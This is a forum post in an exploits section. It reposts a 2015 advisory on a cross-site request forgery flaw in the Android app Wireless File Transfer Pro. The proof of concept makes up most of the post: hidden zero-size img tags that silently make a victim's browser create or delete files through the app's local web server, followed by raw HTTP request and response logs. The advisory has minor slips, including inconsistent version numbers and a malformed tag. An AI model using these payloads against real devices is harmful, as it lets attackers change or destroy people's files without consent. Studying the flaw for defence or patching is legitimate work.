Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
Aerosol

Wireless File Transfer Pro 1.0.1 CSRF

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

Document Title:
===============
Wireless File Transfer Pro 1.0.1  - (Android)   CSRF Remote Command Execution (Creat, Delete)


Release Date:
=============
2015-02-10


Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer. 


(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )

Affected Product(s):
====================
Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1
Lextel Technology  


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium

Request Method(s):
                [+] [GET]

Vulnerable Module(s):
                [+] browse

Vulnerable Parameter(s):
                [+] fileExplorer.html?

Affected Module(s):
                [+] Index of Documents (http://localhost:8888)


Technical Details & Description:
================================
cross site request forgery has been discovered in the Wireless File Transfer Pro 1.0.1  Android mobile web-application.
The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.



Proof of Concept (PoC):
=======================
Creat New Folder 

<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive





HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">


Delete File, Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---


GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive


HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30





Reference:
http://localhost:8888/

Security Risk:
==============
The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)


Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...